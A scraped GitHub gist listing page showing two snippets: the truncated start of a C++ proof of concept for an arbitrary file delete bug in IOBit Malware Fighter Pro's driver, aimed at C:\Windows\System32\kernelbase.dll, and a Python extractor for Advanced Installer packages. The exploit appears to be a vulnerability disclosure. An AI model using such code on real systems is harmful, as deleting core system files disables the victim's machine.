Skip to content

Instantly share code, notes, and snippets.

View Siradankullanici's full-sized avatar

Emirhan Uçan Siradankullanici

View GitHub Profile
@alfarom256
alfarom256 / IOBitStillSucks.cpp
Created January 6, 2025 22:54
Arbitrary File Delete in IOBit Malware Fighter "Pro"
#include <Windows.h>
#include <stdio.h>
const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)";
const char* strDeviceName = R"(\\.\IMFForceDelete123)";
int main() {
DWORD dwReturnVal = 0;
DWORD dwBytesReturned = 0;
BOOL bRes = FALSE;
@KasparNagu
KasparNagu / advancedInstallerExtractor.py
Last active July 7, 2025 08:24
Script to extract Advanced Installer Exes
#!/usr/bin/env python
import sys
import struct
import os
#inspired by https://aluigi.altervista.org/bms/advanced_installer.bms
#with some additionaly reverse engeneering, quite heursitic (footer search, xor guessing etc)
#licence: public domain